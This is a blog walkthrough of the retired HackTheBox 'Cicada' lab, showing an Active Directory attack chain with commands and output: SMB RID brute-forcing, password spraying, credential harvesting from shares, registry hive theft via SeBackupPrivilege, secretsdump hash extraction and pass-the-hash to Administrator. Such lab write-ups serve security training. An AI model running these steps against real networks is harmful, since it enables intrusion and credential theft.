<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>HackTheBox Cicada  Walkthrough | vipa0z</title>
  <meta name="author" content="vipa0z">
  
  <meta name="description" content="HackThebox Cicada  is easy Windows Active Directory box. it start off with enumerating SMB shares to find a new hire welcome note with a default password. RID-cycle to get a list of usernames, and spray that password to find a user still using it. With a valid user I can query LDAP to find another user with their password stored in their description. That user has access to a share with a dev script used for backup, and more creds. Those creds work to get a shell, and the user is in the Backup Operators group, so  exfil the registry hives and dump the machine hashes.">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="HackTheBox Cicada  Walkthrough"/>
  <meta property="og:site_name" content="vipa0z"/>

  
    <meta property="og:image" content="favicon.png"/>
  

  
    <link rel="alternative" href="/atom.xml" title="vipa0z" type="application/atom+xml">
  
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  <!-- 
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>




 -->

  <!--  favicon/indexing -->
  <link rel="icon" type="image/png" href="/favicon.ico/favicon-96x96.png" sizes="96x96" />
  <link rel="icon" type="image/svg+xml" href="/favicon.ico/favicon.svg" />
  <link rel="shortcut icon" href="/favicon.ico/favicon.ico" />
  <link rel="apple-touch-icon" sizes="180x180" href="/favicon.ico/apple-touch-icon.png" />
  <link rel="manifest" href="/favicon.ico/site.webmanifest" />

<meta name="generator" content="Hexo 7.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">vipa0z</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/index" title="Home">
			  <i class="fa fa-home"></i>Home
			</a>
		  </li>
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> HackTheBox Cicada  Walkthrough</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <!-- <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> HackThebox Cicada  is easy Windows Active Directory box. it start off with enumerating SMB shares to find a new hire welcome note with a default password. RID-cycle to get a list of usernames, and spray that password to find a user still using it. With a valid user I can query LDAP to find another user with their password stored in their description. That user has access to a share with a dev script used for backup, and more creds. Those creds work to get a shell, and the user is in the Backup Operators group, so  exfil the registry hives and dump the machine hashes.
		 </div> alert -->
	  		

	  <h2 id=""><a href="#" class="headerlink" title=""></a><img src="/../images/cicada.png" alt="alt text"></h2><h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p>Cicada is easy Windows Active Directory box. it start off with enumerating SMB shares to find a new hire welcome note with a default password. RID-cycle to get a list of usernames, and spray that password to find a user still using it. With a valid user I can query LDAP to find another user with their password stored in their description. That user has access to a share with a dev script used for backup, and more creds. Those creds work to get a shell, and the user is in the Backup Operators group, so  exfil the registry hives and dump the machine hashes.</p>
 <span id="more"></span>
<hr>
<table>
<thead>
<tr>
<th>INFO</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>CTF NAME</td>
<td><strong>Cicada</strong></td>
</tr>
<tr>
<td>Operating System</td>
<td><strong>Windows</strong></td>
</tr>
<tr>
<td>Diffculty</td>
<td><strong>Easy</strong></td>
</tr>
<tr>
<td>Retire date</td>
<td>21 Sep 2024</td>
</tr>
<tr>
<td>Points</td>
<td><strong>25</strong></td>
</tr>
</tbody></table>
<hr>
<h1 id="INFORMATION-GATHERING"><a href="#INFORMATION-GATHERING" class="headerlink" title="INFORMATION GATHERING"></a>INFORMATION GATHERING</h1><p>Information gathering reveals several ports open:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SMB 445</span><br><span class="line">RDP 3389</span><br><span class="line">&lt;SNIP&gt;</span><br></pre></td></tr></table></figure>

<h1 id="ENUMERATION"><a href="#ENUMERATION" class="headerlink" title="ENUMERATION"></a>ENUMERATION</h1><h1 id="SMB-Enumeration"><a href="#SMB-Enumeration" class="headerlink" title="SMB Enumeration"></a>SMB Enumeration</h1><h3 id="anonymous-access"><a href="#anonymous-access" class="headerlink" title="anonymous access"></a>anonymous access</h3><p>Checking smb port for anonymous access:<br><img src="/security/Screenshots/Pasted%20image%2020241216181737.png"></p>
<p>SMB Share enumeration unveils a notice from HR file inside the HR share, let’s check it out<br><img src="/security/Screenshots/Pasted%20image%2020241216182316.png"><br>note down the discovered default password: <code>Cicada$M6Corpb*@Lp#nZp!8</code></p>
<p>with anonymous access enabled to the smb server, we can try to discover users with <code>rid bruteforcing</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">oxdf@hacky$ netexec smb CICADA-DC -u guest -p &#x27;&#x27; --rid-brute</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest: </span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeG</span><br><span class="line">&lt;SNIP&gt;</span><br></pre></td></tr></table></figure>
<p>cleaning the  users list with grep</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat names |grep SidTypeUser| grep -oP &#x27;\\\K[^ ]+&#x27; &gt; users-list.txt</span><br><span class="line">Administrator</span><br><span class="line">Guest</span><br><span class="line">krbtgt</span><br><span class="line">CICADA-DC$</span><br><span class="line">john.smoulder</span><br><span class="line">sarah.dantelia</span><br><span class="line">michael.wrightson</span><br><span class="line">david.orelious</span><br><span class="line">emily.oscars</span><br></pre></td></tr></table></figure>
<h5 id="checking-password-policy"><a href="#checking-password-policy" class="headerlink" title="checking password policy"></a>checking password policy</h5><p><img src="/security/Screenshots/Pasted%20image%2020241217023442.png">   </p>
<p> Now i’m going to run a spraying attack at smb with the curated list of users and the found default password:<br><img src="/security/Screenshots/Pasted%20image%2020241216182736.png"><br>Discovered: <code>michael.wrightson</code> user</p>
<h2 id="Credentialed-Smb-enumeration"><a href="#Credentialed-Smb-enumeration" class="headerlink" title="Credentialed Smb enumeration"></a>Credentialed Smb enumeration</h2><p>dumping all users:<br><img src="/security/Screenshots/Pasted%20image%2020241217024546.png"><br>it appears  david.orelious has left a gift for us, his Creds.<br><code>aRt$Lp#7t*VQ!3 </code><br><img src="/security/Screenshots/Pasted%20image%2020241217030335.png"><br>Authenticated as david reveals the DEV share</p>
<h2 id="DEV-SHARE-ENUMERATION"><a href="#DEV-SHARE-ENUMERATION" class="headerlink" title="DEV SHARE ENUMERATION"></a>DEV SHARE ENUMERATION</h2><p>throughly enumerate content of the DEV share With the spider module:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─$ crackmapexec smb 10.10.11.35 -u &#x27;david.orelious&#x27; -p &#x27;aRt$Lp#7t*VQ!3&#x27; --spider DEV --regex .</span><br></pre></td></tr></table></figure>
<h2 id="Script-file-discovery"><a href="#Script-file-discovery" class="headerlink" title="Script file discovery"></a>Script file discovery</h2><p> Inspecting the output of spider, i found a script file with credentials of another user<br><img src="/security/Screenshots/Pasted%20image%2020241217032915.png"></p>
<p>i found a PS-Credential object with emily.oscars credentials:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$username = &quot;emily.oscars&quot;</span><br><span class="line">$password = ConvertTo-SecureString &quot;Q!3@Lp#M6b*7t*Vt&quot; -AsPlainText -Force</span><br><span class="line">$credentials = New-Object System.Management.Automation.PSCredential($username, $password)</span><br></pre></td></tr></table></figure>
<p>test out  the credentials with evil-winrm:<br><img src="/security/Screenshots/Pasted%20image%2020241217034219.png"></p>
<h4 id="user-flag"><a href="#user-flag" class="headerlink" title="user flag:"></a>user flag:</h4><p><img src="/security/Screenshots/Pasted%20image%2020241217034425.png"></p>
<h4 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h4><p>checking privileges</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">whoami /priv</span><br><span class="line"></span><br><span class="line">get-acl c:\users\administrator</span><br></pre></td></tr></table></figure>

<p><img src="/security/Screenshots/Pasted%20image%2020241217095700.png"></p>
<p>The <code>SeBackupPrivilege</code> can be used to gain read access to any file According to microsoft docs<br>there are many techniques avaiable to exploit this, but im going copy the hives registery manually using <code>reg</code>:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\programdata&gt; reg save hklm\sam sam      </span><br><span class="line">The operation completed successfully.                      </span><br><span class="line">                             </span><br><span class="line">*Evil-WinRM* PS C:\programdata&gt; reg save hklm\system system</span><br><span class="line">The operation completed successfully. </span><br><span class="line">*Evil-WinRM* PS C:\programdata&gt; download sam</span><br><span class="line">                                        </span><br><span class="line">Info: Downloading C:\programdata\sam to sam</span><br><span class="line">                                        </span><br><span class="line">Info: Download successful!</span><br><span class="line">*Evil-WinRM* PS C:\programdata&gt; download system</span><br><span class="line">                                        </span><br><span class="line">Info: Downloading C:\programdata\system to system</span><br><span class="line">                                        </span><br><span class="line">Info: Download successful!</span><br></pre></td></tr></table></figure>
<p>now i’m going to extract the Administrator’s hash from the registery hives with <code>secretsdump.py</code>:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ secretsdump.py -sam sam -system system LOCAL</span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620</span><br><span class="line">[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)</span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn&#x27;t have hash information.</span><br><span class="line">[*] Cleaning up... </span><br></pre></td></tr></table></figure>
<h2 id="or-via-reg-py"><a href="#or-via-reg-py" class="headerlink" title="or via reg.py"></a>or via reg.py</h2><p>Impacket’s reg.py is a remote registry manipulation tool, providing similar functionality to reg.exe in Windows.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ reg.py &#x27;cicada.htb/emily.oscars:Q!3@Lp#M6b*7t*Vt&#x27;@10.10.11.35 backup -o &#x27;C:\windows\temp\&#x27;</span><br><span class="line">Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...</span><br><span class="line">[*] Saved HKLM\SAM to C:\windows\temp\\SAM.save</span><br><span class="line">[*] Saved HKLM\SYSTEM to C:\windows\temp\\SYSTEM.save</span><br><span class="line">[*] Saved HKLM\SECURITY to C:\windows\temp\\SECURITY.save</span><br></pre></td></tr></table></figure>
<p>And then Download them over EvilWinRM:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\windows\temp&gt; download SYSTEM.save</span><br><span class="line">                                        </span><br><span class="line">Info: Downloading C:\windows\temp\SYSTEM.save to SYSTEM.save</span><br><span class="line">                                        </span><br><span class="line">Info: Download successful!</span><br><span class="line">*Evil-WinRM* PS C:\windows\temp&gt; download SAM.save</span><br><span class="line">                                        </span><br><span class="line">Info: Downloading C:\windows\temp\SAM.save to SAM.save</span><br><span class="line">                                        </span><br><span class="line">Info: Download successful!</span><br><span class="line">*Evil-WinRM* PS C:\windows\temp&gt; download SECURITY.save</span><br><span class="line">                                        </span><br><span class="line">Info: Downloading C:\windows\temp\SECURITY.save to SECURITY.save</span><br><span class="line">                                        </span><br><span class="line">Info: Download successful!</span><br></pre></td></tr></table></figure>

<h1 id="testing-the-hash"><a href="#testing-the-hash" class="headerlink" title="testing the hash"></a>testing the hash</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ netexec smb CICADA-DC -u administrator -H aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ evil-winrm -i cicada.htb -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341</span><br><span class="line">                                        </span><br><span class="line">Evil-WinRM shell v3.5</span><br><span class="line">                                        </span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">*Evil-WinRM* PS C:\Users\Administrator\Documents&gt;</span><br></pre></td></tr></table></figure>
<p>get the flag:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\Administrator\desktop&gt; type root.txt</span><br><span class="line">b7cd8************************</span><br></pre></td></tr></table></figure>
	  <div class="article-footer-copyright">

</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2025/03/26/dcsync/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/09/22/HTB-SolarLab/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2025-01-22 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/Writeup/">Writeup<span>2</span></a></li> <li><a href="/tags/nmap/">nmap<span>2</span></a></li> <li><a href="/tags/HTB/">HTB<span>2</span></a></li> <li><a href="/tags/smb/">smb<span>2</span></a></li> <li><a href="/tags/windows/">windows<span>3</span></a></li> <li><a href="/tags/flask/">flask<span>2</span></a></li> <li><a href="/tags/privilege-escalation/">privilege escalation<span>3</span></a></li> <li><a href="/tags/openfire/">openfire<span>2</span></a></li> <li><a href="/tags/chisel/">chisel<span>2</span></a></li> <li><a href="/tags/password-spray/">password-spray<span>2</span></a></li> <li><a href="/tags/htb-Cicada/">htb Cicada<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2025 vipa0z's Blog
  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
